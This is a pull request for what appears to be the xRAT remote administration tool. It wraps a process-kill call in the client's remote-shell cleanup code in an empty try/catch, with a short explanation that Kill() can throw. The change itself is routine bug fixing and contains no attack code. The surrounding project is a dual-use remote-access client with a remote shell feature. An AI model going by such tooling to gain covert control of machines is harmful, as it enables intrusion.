### PR TITLE
Fixes for uninstall issues

### DIFF
--- a/Client/Core/RemoteShell/Shell.cs
+++ b/Client/Core/RemoteShell/Shell.cs
@@ -98,7 +98,14 @@ namespace xClient.Core.RemoteShell
                     if (_prc != null)
                     {
                         if (!_prc.HasExited)
-                            _prc.Kill();
+                        {
+                            try
+                            {
+                                _prc.Kill();
+                            }
+                            catch
+                            { }
+                        }
                         _prc.Dispose();
                         _prc = null;
                     }


### PR DESCRIPTION
Should fix second issue of https://github.com/MaxXor/xRAT/issues/153

<hr />

<h2>Brief Explanation</h2>
<code>Process.Kill()</code> can throw quite a few different exceptions. While checking if the process has exited makes it slightly safer, exceptions can still be thrown for many other reasons (perhaps the process is already terminating, or a process can not be terminated).
The point of it should be: Make sure the process is not null. If it has not exited yet, try to kill it. If it can't be killed, do not worry anymore and simply dispose of it because it.